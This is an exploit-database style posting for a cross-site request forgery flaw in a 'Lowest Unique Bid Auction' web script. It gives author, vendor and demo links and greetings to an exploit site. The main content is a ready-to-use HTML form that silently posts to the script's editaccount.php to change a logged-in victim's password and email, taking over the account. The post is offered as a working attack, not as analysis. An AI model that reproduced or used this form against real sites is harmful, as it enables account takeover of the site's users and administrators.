# Exploit Title: Lowest Unique Bid Auction Scripts CSRF # Author: Jonturk75 # Vendor or Software Link: http://www.scripts.com/viewscript/lowest-unique-bid-auction-scripts/31616/ # Category:: webapps # Demo : http://www.uniquescriptz.com/lowest_unique_bid_auction_v3t2/manageauction/index.php # Greetz: Inj3ct0r Exploit DataBase 1337day.com <form action="target.com/[PATH]/editaccount.php" method="POST" enctype="multipart/form-data" name="form1"> <input type="hidden" value="bonkerbids" name="new password"/></td> <input type="hidden" value="yourmail@mail.com" name="email"/> <input type="submit" value="submit" name="submit"/> </form>